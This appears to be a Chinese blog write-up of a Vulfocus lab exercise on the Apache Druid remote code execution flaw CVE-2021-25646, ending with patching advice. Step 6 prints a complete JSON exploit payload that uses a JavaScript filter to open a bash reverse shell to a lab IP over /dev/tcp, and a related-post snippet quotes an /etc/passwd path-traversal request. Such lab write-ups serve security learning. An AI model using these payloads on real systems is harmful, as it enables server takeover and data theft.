[Vulfocus解题系列] druid 远程命令执行 (CVE-2021-25646)

最新推荐文章于 2024-05-31 17:23:44 发布
最新推荐文章于 2024-05-31 17:23:44 发布
阅读量1.2k 收藏 3
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45813980/article/details/118787351
版权

漏洞介绍

名称: druid 远程命令执行 (CVE-2021-25646)

描述: Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。 Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中,经过身份验证的用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。

影响版本

Apache Druid <= 0.20.1

解题过程

1.打开靶场
在这里插入图片描述
2.先后点击下图所示位置
在这里插入图片描述
3.在右下角输入指定内容

Base directory:
quickstart/tutorial/
 File filter:
wikiticker-2015-09-12-sampled.json.gz

在这里插入图片描述
4.输入完成后依次点击如下图所示按钮
在这里插入图片描述
5.然后一直点击右下角的Next按钮,同时注意上方的导航栏,每点击一次 Next,导航栏都会往后移动一个,到filter之前的时候,点击Next进行抓包。
在这里插入图片描述
注意看下图中红框中的内容,如果不是filter,说明抓错包了
在这里插入图片描述

6.替换数据包中POST的Data数据,改成我们的POC,服务器打开监听,发送数据包,执行反弹shell的命令

POC

{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript",
"function":"function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/192.168.79.128/2222 0>&1')}",
"dimension":"added",
"":{
"enabled":"true"
}
}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000,"cacheKey":"4ddb48fdbad7406084e37a1b80100214"}}

在这里插入图片描述
7.反弹shell成功,执行获得flag的命令,获得flag
在这里插入图片描述

修复建议

建议及时更新Apache Druid,
下载链接为:https://druid.apache.org/downloads.html

https://github.com/apache/druid/releases/tag/druid-0.20.1

00勇士王子
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
CVE-2021-25646-Apache Druid漏洞POC.py
02-26
CVE-2021-25646-Apache Druid漏洞POC.py
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行.md
04-23
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行
CVE-2021-25646:Apache Druid远程代码执行漏洞
就是法老
08-24 2102
一:漏洞描述 阿里云安全向Apache官方报告了Apache Druid远程代码执行漏洞,分配CVE编号为CVE-2021-25646 Apache Druid 包括执行用户提供的 JavaScript 的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在 Druid 0.20.0 及更低版本中,经过身份验证的用户可以构造传入的json串来控制一些敏感的参数发送恶意请求,利用 Apache Druid 漏洞可以执行任意代码。 影响范围:Apache Druid &l
vulfocus靶场名称: apache-cve_2021_41773/apache-cve_2021_42013
没有故事
04-19 540
Apache HTTP Server 2.4.49、2.4.50版本对路径规范化所做的更改中存在一个路径穿越漏洞,攻击者可利用该漏洞读取到Web目录外的其他文件,如系统配置文件、网站源码等,甚至在特定情况下,攻击者可构造恶意请求执行命令,控制服务器。目录遍历:GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd。1:get:在url后面加上。远程代码执行:bp抓包。
Apache Druid命令执行漏洞复现
weixin_53696027的博客
06-02 522
CVE-2019-25646是由由阿里云安全发现的 Apache Druid 远程代码执行漏洞
Apache Druid远程代码执行漏洞(CVE-2021-25646)
weixin_44047654的博客
12-05 1701
Apache Druid远程代码执行漏洞(CVE-2021-25646)
Apache Druid 代码执行CVE-2021-25646)漏洞复现
最新发布
YJ_12340的博客
05-31 416
Apache Druid是一个高性能的实时分析型数据库,旨在对大型数据集进行快速查询分析。Druid最常被当做数据库来用以支持实时摄取、高性能查询和高稳定运行的应用场景,同时,Druid也通常被用来助力分析型应用的图形化界面,或者当做需要快速聚合的高并发后端API,Druid最适合应用于面向事件类型的数据。主要应用于:点击流分析、网络监测分析、服务指标存储、供应链分析、应用性能指标分析、数字广告分析、商务智能 / OLAP。
【技术分享】CVE-2021-25646 Apache Druid 远程代码执行漏洞分析 .pdf
09-05
《Apache Druid CVE-2021-25646 远程代码执行漏洞深度解析》 Apache Druid,作为一个高性能、列式存储的开源分布式数据存储系统,广泛应用于商业智能和OLAP(在线分析处理)场景,以处理大量实时和历史数据。然而,...
Silentsoul04#vulnerability-paper-1#CVE-2021-25646:Apache Druid R
07-25
声明:请勿用作违法用途,否则后果自负0x01 简介Druid 不仅是一个数据库连接池,还包含一个 ProxyDriver、一系列内置的 JDBC 组件库、一个
敏感信息泄露总结
goddemon
03-15 1万+
一.源代码泄露 二.服务器导致的泄露 Apache类泄露 样例文件泄露 /examples/servlets/servlet/CookieExample /examples/servlets/servlet/RequestHeadersExample /examples/jsp/snp/snoop.jsp /examples/async/async1 cookie泄露 IIS泄露 典型iis短文件名 https://github.com/lijiejie/IIS_shortname_Scanner To
alibaba/druid 常见问题
热门推荐
codepython的专栏
01-03 3万+
1,363 Fork895 renfufei edited this page on 16 Sep 2014 · 51 revisions  Pages 54 Benchmark_aliyunContributorsDBCP迁移Druid Change Logdruid m
Apache druid 远程命令执行CVE-2021-25646
YouthBelief的博客
11-04 318
druid 远程命令执行CVE-2021-25646druid 远程命令执行CVE-2021-25646)0x01 漏洞描述0x02 影响范围0x03 漏洞复现0x04 漏洞修复 druid 远程命令执行CVE-2021-25646) Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。 0x01 漏洞描述 Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。此功能在用于高信任
Apache Druid命令执行漏洞(CVE-2021-25646)复现
weixin_46137328的博客
02-04 1417
0x00 漏洞概述Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。Apache Druid 包括执行用户提供的...
一次 Druid 连接池泄露引发的血案!
Java技术栈,分享最主流的Java技术
03-12 4985
Java技术栈www.javastack.cn优秀的Java技术公众号最近某个应用程序老是卡,需要重启才能解决问题,导致被各种投诉,排查问题是 Drui...
struts2 代码执行CVE-2018-11776)漏洞复现 vulfocus夺旗
muhan的博客
04-15 4442
1、启动环境:直接vulfocus搜索cve编号启动,并访问环境ip地址 2、判断是否有漏洞: 使用特定payload拼接url,访问抓包 ip地址/struts2-showcase/$%7B233*233%7D/actionChain1.action 利用BurpSuite抓包并改包,Go得到下图所示结果,说明存在漏洞。可以看到,233X233的结果已经在Location头中返回 3、构造POC,替换掉请求内容 原始poc: ${(#dm=@ognl.OgnlContext@DEFAULT
Druid未授权访问利用
春日野穹
11-14 2万+
引言~ 最近外网打点遇到个Druid未授权访问漏洞,觉得过程比较有趣,所以简单记录一下 Druid简介 druid是阿里研发的一款数据库连接池,其开发语言为java,druid集合了c3p0、dbcp、proxool等连接池的优点,还加入了日志监控、session监控等数据监控功能,使用Druid能有效的监控DB池连接和SQL的执行情况。 更多信息可参考官方GitHub项目:https://github.com/alibaba/druid druid虽高效好用,但当开发者配置不当时就可能造成未授权访问,攻
摘要: Druid连接池一个设置引发的血案 -- 链接池出现问题
心有猛虎,细嗅蔷薇
08-29 2577
原文来自:http://www.cnblogs.com/water-1/p/6843960.html 摘要: Druid连接池一个设置引发的血案     今天在一台配置很低的机器上运行批量更新的程序~~~     大概跑了三十分钟~~~这配置~~~这程序~~~     然后华丽丽的报异常了~~~     具体异常是这样的, 1
vulfocus复现:Log4j2远程命令执行2
woai_zhongguo的博客
07-15 713
Log4j2远程命令执行2复现过程
springboot druid-spring-boot-starter
12-02
`druid-spring-boot-starter`是一个用于在Spring Boot应用程序中集成Druid连接池的Starter。Druid是一个高性能的JDBC连接池,具有监控和扩展功能。使用`druid-spring-boot-starter`可以轻松地将Druid连接池集成到Spring Boot应用程序中。 以下是使用`druid-spring-boot-starter`的步骤: 1.在Maven项目中添加以下依赖项: ```xml <dependency> <groupId>com.alibaba</groupId> <artifactId>druid-spring-boot-starter</artifactId> <version>1.1.9</version> </dependency> ``` 2.在`application.properties`文件中配置Druid连接池的属性: ```properties spring.datasource.url=jdbc:mysql://localhost:3306/test spring.datasource.username=root spring.datasource.password=root spring.datasource.driver-class-name=com.mysql.jdbc.Driver # Druid specific configuration spring.datasource.type=com.alibaba.druid.pool.DruidDataSource spring.datasource.druid.initial-size=5 spring.datasource.druid.min-idle=5 spring.datasource.druid.max-active=20 spring.datasource.druid.test-on-borrow=true spring.datasource.druid.validation-query=SELECT 1 ``` 3.在Spring Boot应用程序中使用Druid连接池: ```java @Autowired private DataSource dataSource; ``` 以上是使用`druid-spring-boot-starter`的基本步骤,你可以根据自己的需求进行配置和使用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值